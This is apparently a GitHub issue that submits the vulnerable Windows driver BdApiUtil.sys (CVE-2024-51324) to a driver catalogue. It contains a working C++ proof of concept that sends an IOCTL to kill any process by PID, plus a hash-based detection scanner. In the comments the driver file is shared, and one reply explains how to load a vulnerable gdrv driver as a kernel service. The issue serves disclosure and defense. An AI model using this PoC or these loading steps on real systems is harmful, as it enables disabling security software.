
Request to add vulnerable driver BdApiUtil.sys (CVE-2024-51324) #204

Open
christopher-ellis-workday opened this issue Feb 7, 2025 · 6 comments

Comments

@christopher-ellis-workday

christopher-ellis-workday commented Feb 7, 2025

I was hoping to get BdApiUtil.sys added to this as a vulnerable driver. I wasn't sure of the best place to do that, so I opened an issue.

Summary:
I found an IOCTL code which takes a PID and terminates it (arbitrary process termination). Admin privileges are required to install the driver, but if it's already installed, it can be called by any user (non-admin).

Here's the specific version I tested against in VT (likely other versions are vulnerable too):

http://virustotal.com/gui/file/32198295d2a2700b9895fff999c2b233f9befb0bc175815ec4b71ee926b6edfc

The IOCTL needed is 0x800024B4

PoC:

```cpp
#include <windows.h>
#include <stdio.h>
#include <iostream>

#define IOCTL_TERMINATE_PROCESS 0x800024B4
#define DEVICE_NAME L"\\\\.\\BdApiUtil"

int main() {
	unsigned int pid;

	//1. Open a handle to the driver (CreateFileW: the device name is a wide string)
	HANDLE hDriver = CreateFileW(
		DEVICE_NAME,
		GENERIC_READ | GENERIC_WRITE,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);

	if (hDriver == INVALID_HANDLE_VALUE) {
		printf("Error opening device: %lu\n", GetLastError());
		return 1;
	}

	//Get the PID of the process to terminate
	printf("PID please : \n");
	if (scanf_s("%u", &pid) != 1) {
		printf("Invalid PID\n");
		CloseHandle(hDriver);
		return 1;
	}

	//2. Send a code to the driver
	DWORD bytesReturned = 0;
	//Zero-initialised so the prints below never read uninitialised memory.
	//Note: no output buffer is passed to DeviceIoControl, so bytesReturned stays 0
	//and outBuffer stays empty; the PID is the only input.
	BYTE outBuffer[256] = { 0 };

	BOOL ioctlResult = DeviceIoControl(
		hDriver,
		IOCTL_TERMINATE_PROCESS,
		&pid,
		sizeof(pid),
		NULL,
		0,
		&bytesReturned,
		NULL
	);

	if (!ioctlResult) {
		printf("Killing IOCTL failed with error: %lu\n", GetLastError());
	}
	else {
		printf("DeviceIoControl succeeded.\n");

		//Print the output buffer in hexadecimal
		for (DWORD i = 0; i < bytesReturned && i < sizeof(outBuffer); i++) {
			printf("%02X ", outBuffer[i]);
		}
		printf("\n");

		//Print the output as string just in case
		printf("Output Buffer as String: %s\n", outBuffer);
	}

	//Cleanup
	CloseHandle(hDriver);

	std::cout << "sent the IOCTL: " << std::endl;
	std::cout << "Bytes returned: " << bytesReturned << std::endl;
	return 0;
}
```
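As a defender-side addition (this is not code from the issue or from the driver's vendor), a small Python scanner that hunts for on-disk copies of the tested sample by the SHA-256 quoted above, so a fleet can be checked for the driver before it is abused; the default scan root and the inclusion of `.bin` alongside `.sys` are assumptions.

```python
"""Find on-disk copies of known-vulnerable drivers by SHA-256 (added example)."""
import hashlib
import os

# SHA-256 of the BdApiUtil.sys sample referenced in the issue (from the VirusTotal link).
KNOWN_VULNERABLE_DRIVERS = {
    "32198295d2a2700b9895fff999c2b233f9befb0bc175815ec4b71ee926b6edfc":
        "BdApiUtil.sys (CVE-2024-51324) - arbitrary process termination IOCTL",
}


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large driver packages do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_vulnerable_drivers(root, blocklist=KNOWN_VULNERABLE_DRIVERS,
                            extensions=(".sys", ".bin")):
    """Walk `root` and return (path, sha256, label) for every file whose hash is blocklisted.

    `.bin` is included (assumption) because driver collections often ship samples
    renamed to .bin; a rename does not change the hash, so the match still fires.
    """
    normalized = {k.lower(): v for k, v in blocklist.items()}
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_file(path)
            except OSError:
                continue  # unreadable file (locked, permission denied): skip, keep scanning
            label = normalized.get(digest.lower())
            if label:
                hits.append((path, digest, label))
    return hits


if __name__ == "__main__":
    import sys
    # Assumed default: the standard Windows driver store; pass another root as argv[1].
    scan_root = sys.argv[1] if len(sys.argv) > 1 else r"C:\Windows\System32\drivers"
    for path, digest, label in find_vulnerable_drivers(scan_root):
        print(f"{path}: {digest} matches {label}")
```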
@plisskien

Can I get the .sys file?

@christopher-ellis-workday (Author)

I think this will work, hopefully it attaches okay

BdApiUtil.sys.zip

@plisskien

Thank you a lot for sharing this file, I can confirm the vulnerability (I don't get why ppl still code drivers this way LOL), but the hash from VirusTotal is different, you should update it.

IOCTL: [screenshot]

NAME: [screenshot]

FUNCTION: [screenshot]

@christopher-ellis-workday (Author)

Ah, thank you. Sorry, I must have grabbed a different version; I've updated the link. I appreciate it.

@goaterdd

goaterdd commented Mar 1, 2025

Hey all, I know this isn't the correct place for this, but I do need help with getting a vulnerable gdrv .sys file. The ones I have downloaded were extracted in hex and I'm not too sure if they work; does anyone here have the download for the actual .sys file?

@plisskien

plisskien commented Mar 3, 2025

> Hey all, I know this isn't the correct place for this, but I do need help with getting a vulnerable gdrv .sys file. The ones I have downloaded were extracted in hex and I'm not too sure if they work; does anyone here have the download for the actual .sys file?

If you downloaded it from loldrivers.io, just change the name from .bin to .sys, create a service of type kernel and run it. Is this what you mean?
